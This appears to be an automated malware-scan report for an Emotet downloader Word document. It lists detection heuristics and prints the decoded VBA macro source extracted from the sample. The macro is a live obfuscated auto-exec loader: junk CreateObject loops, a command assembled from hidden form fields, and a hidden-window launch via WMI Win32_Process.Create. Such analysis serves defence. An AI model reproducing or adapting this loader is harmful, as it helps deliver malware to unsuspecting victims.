MALICIOUS
350
Risk Score
Heuristics 10
-
ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
CreateObject ("M950421") -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
CreateObject ("M950421") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject ("M950421") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set z36470 = c1690793(GetObject(CVar("winmgmts:Win32_Process"))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10281 bytes |
SHA-256: 743a7e7dfda2a2565e8fdd26c867834f9c33c3ccf41cdf93f56e900b90fe151f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "j052640"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "n2581304, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b_0376, 1, 1, MSForms, TextBox"
Attribute VB_Control = "f616817, 2, 2, MSForms, TextBox"
Attribute VB_Control = "A64818, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c_0237_4, 4, 4, MSForms, TextBox"
Attribute VB_Control = "C_4934_0, 5, 5, MSForms, TextBox"
Attribute VB_Name = "u6446562"
Attribute VB_Name = "k6471_8"
Attribute VB_Name = "Y5513012"
Attribute VB_Name = "Q12543"
Attribute VB_Name = "k67426_"
Attribute VB_Name = "b001947"
Attribute VB_Name = "r3273_"
Function c1690793(h292409)
While C53_587 And D081842
CreateObject ("M950421")
CreateObject ("z5578801")
CreateObject ("231383114")
CreateObject ("213146393")
CreateObject ("f107038")
Wend
While P0_58471 And Q52906
CreateObject ("j25_87")
CreateObject ("I861_8")
CreateObject ("483619105")
CreateObject ("688624756")
CreateObject ("P0737212")
Wend
While j43773 And z818476_
CreateObject ("w7_369_0")
CreateObject ("z56819")
CreateObject ("706577816")
CreateObject ("343803285")
CreateObject ("P__5__95")
Wend
Set c1690793 = CVar(h292409)
While X2_54143 And v82302_
CreateObject ("b9020_5")
CreateObject ("v137156")
CreateObject ("560909251")
CreateObject ("777227899")
CreateObject ("o2667707")
Wend
While F83_70 And J07534
CreateObject ("M247284")
CreateObject ("C168_02_")
CreateObject ("5610351")
CreateObject ("963416791")
CreateObject ("I22682")
Wend
While q675499 And i083960
CreateObject ("D92722")
CreateObject ("U085700")
CreateObject ("510324829")
CreateObject ("550402930")
CreateObject ("i89530")
Wend
End Function
Sub _
_
_
autoopen()
On Error Resume Next
While f41960 And w03508
CreateObject ("I2731497")
CreateObject ("K9_908_")
CreateObject ("428548477")
CreateObject ("355109480")
CreateObject ("q6083913")
Wend
While S409_350 And p37303
CreateObject ("v88_801")
CreateObject ("J00123")
CreateObject ("857831959")
CreateObject ("592303265")
CreateObject ("J47206")
Wend
f36620
While q89012 And r5958_
CreateObject ("D_692484")
CreateObject ("k06017")
CreateObject ("677609100")
CreateObject ("931606268")
CreateObject ("i27826")
Wend
While z7611852 And t1014709
CreateObject ("E13633")
CreateObject ("M7_78_1")
CreateObject ("800206652")
CreateObject ("235991737")
CreateObject ("u_33526")
Wend
While S6627_2 And H002448
CreateObject ("l01278")
CreateObject ("Z3367643")
CreateObject ("150489629")
CreateObject ("789683960")
CreateObject ("Y3__8196")
Wend
End Sub
Attribute VB_Name = "T10276"
Function f36620()
On Error Resume Next
While A944561 And Z52565
CreateObject ("Y7427961")
CreateObject ("i5_617")
CreateObject ("510837001")
CreateObject ("217796745")
CreateObject ("U026_4_5")
Wend
While z8647351 And n21719
CreateObject ("w4765347")
CreateObject ("u2_19009")
CreateObject ("333769331")
CreateObject ("749270997")
CreateObject ("r46_2_")
Wend
While L02617 And j0539253
CreateObject ("f3_31698")
CreateObject ("k938_0")
CreateObject ("968909467")
CreateObject ("365247816")
CreateObject ("a759445")
Wend
J57944 = j052640.C_4934_0 + j052640.b_0376 + j052640.C_4934_0 + j052640.f616817 + j052640.C_4934_0 + j052640.C_4934_0 + j052640.A64818 + j052640.C_4934_0 + j052640.C_4934_0 + j052640.c_0237_4 + j052640.C_4934_0 + j052640.n2581304 + j052640.C_4934_0
While h17136_ And F8488805
CreateObject ("k3058313")
CreateObject ("k990434")
CreateObject ("641411210")
CreateObject ("763234801")
CreateObject ("b_6_16")
Wend
While F5964_ And O412822
CreateObject ("z83086")
CreateObject ("k531858")
CreateObject ("362066484")
CreateObject ("442434013")
CreateObject ("d870335")
Wend
Set z36470 = c1690793(GetObject(CVar("winmgmts:Win32_Process")))
While q576__42 And c4829571
CreateObject ("h581025")
CreateObject ("h5679682")
CreateObject ("787795292")
CreateObject ("610506192")
CreateObject ("Y_5975")
Wend
While l846182 And M523151
CreateObject ("L66298")
CreateObject ("b__2752")
CreateObject ("876262853")
CreateObject ("517602965")
CreateObject ("A80426")
Wend
z36470.Create B9963571 + J57944 + z70732_, z_56390, w734090, I4750_5
While i4734_80 And I3903802
CreateObject ("a856067")
CreateObject ("f514892")
CreateObject ("612882573")
CreateObject ("637978611")
CreateObject ("O346795")
Wend
While R5443759 And F33945_
CreateObject ("f883_6_8")
CreateObject ("L9043881")
CreateObject ("940702714")
CreateObject ("959123768")
CreateObject ("V44141")
Wend
While i_6049 And U65842
CreateObject ("l50_17")
CreateObject ("C00_4200")
CreateObject ("633505917")
CreateObject ("817515921")
CreateObject ("J82404")
Wend
End Function
Attribute VB_Name = "i44961"
Public Function w734090()
While J008801_ And i335466
CreateObject ("R_85255")
CreateObject ("f44297")
CreateObject ("43115074")
CreateObject ("986732797")
CreateObject ("U63022")
Wend
While f000505 And G0_1_0
CreateObject ("N83732")
CreateObject ("p93942")
CreateObject ("218665834")
CreateObject ("144606646")
CreateObject ("M3959_44")
Wend
While C72831_1 And R099_58
CreateObject ("G0955347")
CreateObject ("I1_4100")
CreateObject ("728645759")
CreateObject ("758835993")
CreateObject ("j540721")
Wend
Set w734090 = c1690793(GetObject(CVar("winmgmts:Win32_ProcessStartup")))
While C009380 And o712129
CreateObject ("X379__")
CreateObject ("N643952")
CreateObject ("493885488")
CreateObject ("227283560")
CreateObject ("b58240_")
Wend
While q9999_8 And F392790
CreateObject ("z51_5726")
CreateObject ("a73576")
CreateObject ("328081271")
CreateObject ("146380880")
CreateObject ("P69599_")
Wend
While t76070 And c554884
CreateObject ("V87723")
CreateObject ("u95016")
CreateObject ("251263640")
CreateObject ("159975741")
CreateObject ("k7812_17")
Wend
n908_9_ = vbError - vbError
While O35378_1 And z924308
CreateObject ("d0209874")
CreateObject ("Z5_6330")
CreateObject ("122650399")
CreateObject ("524931456")
CreateObject ("h197903")
Wend
While k2_402 And E8984130
CreateObject ("q91033")
CreateObject ("m69822")
CreateObject ("89976527")
CreateObject ("41375022")
CreateObject ("U4_324")
Wend
With w734090
While B0_00384 And t960470
CreateObject ("k2954111")
CreateObject ("W25358")
CreateObject ("267743603")
CreateObject ("860863218")
CreateObject ("n7819_")
Wend
While r503425 And L5570204
CreateObject ("A3_34598")
CreateObject ("K5537218")
CreateObject ("65728174")
CreateObject ("708463808")
CreateObject ("I90611")
Wend
. _
ShowWindow = n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_
While j503_17 And c3458235
CreateObject ("l009460")
CreateObject ("t056179")
CreateObject ("812666603")
CreateObject ("926028968")
CreateObject ("t_4468")
Wend
While o98243 And r1149435
CreateObject ("z2016093")
CreateObject ("i79422_1")
CreateObject ("673353660")
CreateObject ("52144376")
CreateObject ("t6528860")
Wend
While K7582086 And O2755120
CreateObject ("X83621")
CreateObject ("q55__663")
CreateObject ("705363984")
CreateObject ("932618134")
CreateObject ("h291_08")
Wend
End With
While Q22_61 And h2218987
CreateObject ("I8503478")
CreateObject ("j286432")
CreateObject ("964493506")
CreateObject ("386471797")
CreateObject ("N0972345")
Wend
While J973_117 And c63993
CreateObject ("F5941692")
CreateObject ("M6_0_23")
CreateObject ("714426587")
CreateObject ("929776296")
CreateObject ("K94523_1")
Wend
While E469809 And j839574
CreateObject ("I15075")
CreateObject ("V295214")
CreateObject ("88903188")
CreateObject ("314176008")
CreateObject ("h4632670")
Wend
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.